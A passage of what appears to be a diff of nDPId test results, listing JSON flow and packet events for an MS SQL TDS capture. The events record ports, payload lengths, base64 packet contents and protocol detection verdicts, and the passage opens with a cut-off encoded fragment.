IAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":35,"packets-processed":34,"total-skipped-flows":0,"total-l4-data-len":13137,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":8,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1278068444584} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 